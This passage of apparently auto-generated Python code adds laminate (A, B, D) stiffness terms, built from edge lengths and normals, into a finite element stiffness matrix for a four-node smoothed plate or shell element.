k0[i2*dof+0, i1*dof+4] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+0, i2*dof+0] += Ac*((A11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+0, i2*dof+1] += Ac*((A12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+0, i2*dof+3] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+0, i2*dof+4] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+0, i3*dof+0] += Ac*((A11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+0, i3*dof+1] += Ac*((A12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+0, i3*dof+3] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+0, i3*dof+4] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+0, i4*dof+0] += Ac*((A11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+0, i4*dof+1] += Ac*((A12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+0, i4*dof+3] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+0, i4*dof+4] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+1, i1*dof+0] += Ac*((A12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+1, i1*dof+1] += Ac*((A22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+1, i1*dof+3] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+1, i1*dof+4] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+1, i2*dof+0] += Ac*((A12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+1, i2*dof+1] += Ac*((A22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+1, i2*dof+3] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+1, i2*dof+4] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+1, i3*dof+0] += Ac*((A12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+1, i3*dof+1] += Ac*((A22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+1, i3*dof+3] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+1, i3*dof+4] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+1, i4*dof+0] += Ac*((A12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+1, i4*dof+1] += Ac*((A22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+1, i4*dof+3] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+1, i4*dof+4] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+3, i1*dof+0] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+3, i1*dof+1] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+3, i1*dof+3] += Ac*((D11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+3, i1*dof+4] += Ac*((D12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+3, i2*dof+0] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+3, i2*dof+1] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+3, i2*dof+3] += Ac*((D11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+3, i2*dof+4] += Ac*((D12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+3, i3*dof+0] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+3, i3*dof+1] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+3, i3*dof+3] += Ac*((D11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+3, i3*dof+4] += Ac*((D12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+3, i4*dof+0] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+3, i4*dof+1] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+3, i4*dof+3] += Ac*((D11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
